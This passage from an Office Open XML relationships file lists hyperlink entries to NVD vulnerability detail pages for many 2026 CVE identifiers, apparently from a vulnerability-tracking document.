TargetMode="External" Id="rId1819" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32258" TargetMode="External" Id="rId1820" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33997" TargetMode="External" Id="rId1821" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44249" TargetMode="External" Id="rId1822" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44745" TargetMode="External" Id="rId1823" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4600" TargetMode="External" Id="rId1824" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46099" TargetMode="External" Id="rId1825" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47231" TargetMode="External" Id="rId1826" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId1827" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48081" TargetMode="External" Id="rId1828" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50979" TargetMode="External" Id="rId1829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52521" TargetMode="External" Id="rId1830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52793" TargetMode="External" Id="rId1831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53510" TargetMode="External" Id="rId1832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53580" TargetMode="External" Id="rId1833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54083" TargetMode="External" Id="rId1834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54330" TargetMode="External" Id="rId1835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId1836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55065" TargetMode="External" Id="rId1837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55228" TargetMode="External" Id="rId1838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57233" TargetMode="External" Id="rId1839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61641" TargetMode="External" Id="rId1840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61699" TargetMode="External" Id="rId1841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62667" TargetMode="External" Id="rId1842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64665" TargetMode="External" Id="rId1843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64679" TargetMode="External" Id="rId1844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65181" TargetMode="External" Id="rId1845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId1846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId1847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId1848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId1849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId1850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId1851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId1852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId1853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId1854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId1855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId1856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId1857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId1858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId1859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId1860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId1861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId1862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70465" TargetMode="External" Id="rId1863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70468" TargetMode="External" Id="rId1864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70482" TargetMode="External" Id="rId1865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70494" TargetMode="External" Id="rId1866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId1867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71308" TargetMode="External" Id="rId1868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71320" TargetMode="External" Id="rId1869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71407" TargetMode="External" Id="rId1870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72903" TargetMode="External" Id="rId1871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72921" TargetMode="External" Id="rId1872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId1873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId1874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId1875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73223" TargetMode="External" Id="rId1876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73225" TargetMode="External" Id="rId1877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73227" TargetMode="External" Id="rId1878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73286" TargetMode="External" Id="rId1879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73289" TargetMode="External" Id="rId1880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73334" TargetMode="External" Id="rId1881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73659" TargetMode="External" Id="rId1882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId1883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75464" TargetMode="External" Id="rId1884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76009" TargetMode="External" Id="rId1885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77317" TargetMode="External" Id="rId1886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId1887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77567" TargetMode="External" Id="rId1888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId1889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId1890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId1891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78583" TargetMode="External" Id="rId1892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId1893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78839" TargetMode="External" Id="rId1894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79678" TargetMode="External" Id="rId1895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79746" TargetMode="External" Id="rId1896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80132" TargetMode="External" Id="rId1897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80354" TargetMode="External" Id="rId1898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81268" TargetMode="External" Id="rId1899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81784" TargetMode="External" Id="rId1900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81801" TargetMode="External" Id="rId1901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81805" TargetMode="External" Id="rId1902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81891" TargetMode="External" Id="rId1903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81892" TargetMode="External" Id="rId1904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82302" TargetMode="External" Id="rId1905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82925" TargetMode="External" Id="rId1906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId1907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId1908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84381" TargetMode="External" Id="rId1909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId1910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId1911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86242" TargetMode="External" Id="rId1912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86479" TargetMode="External" Id="rId1913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87016" TargetMode="External" Id="rId1914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87036" TargetMode="External" Id="rId1915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87075" TargetMode="External" Id="rId1916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87457" TargetMode="External" Id="rId1917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87467" TargetMode="External" Id="rId1918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87471" TargetMode="External" Id="rId1919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87499" TargetMode="External" Id="rId1920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87505" TargetMode="External" Id="rId1921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87509" TargetMode="External" Id="rId1922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87514" TargetMode="External" Id="rId1923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87530" TargetMode="External" Id="rId1924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87533" TargetMode="External" Id="rId1925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87537" TargetMode="External" Id="rId1926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87554" TargetMode="External" Id="rId1927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87606" TargetMode="External" Id="rId1928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87874" TargetMode="External" Id="rId1929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87958" TargetMode="External" Id="rId1930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14873" TargetMode="External" Id="rId1931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15581" TargetMode="External" Id="rId1932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId1933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30826" TargetMode="External" Id="rId1934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30890" TargetMode="External" Id="rId1935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31803" TargetMode="External" Id="rId1936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-31880" TargetMode="External" Id="rId1937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42807" TargetMode="External" Id="rId1938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45790" TargetMode="External" Id="rId1939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47858" TargetMode="External" Id="rId1940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48080" TargetMode="External" Id="rId1941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49832" TargetMode="External" Id="rId1942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52831" TargetMode="External" Id="rId1943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52833" TargetMode="External" Id="rId1944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53932" TargetMode="External" Id="rId1945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId1946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId1947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId1948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId1949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId1950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId1951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId1952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId1953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId1954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId1955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId1956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId1957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId1958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId1959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId1960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId1961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId1962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId1963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId1964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId1965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId1966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId1967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId1968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId1969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId1970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId1971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId1972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId1973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId1974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId1975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId1976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId1977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId1978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId1979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId1980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId1981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId1982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId1983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 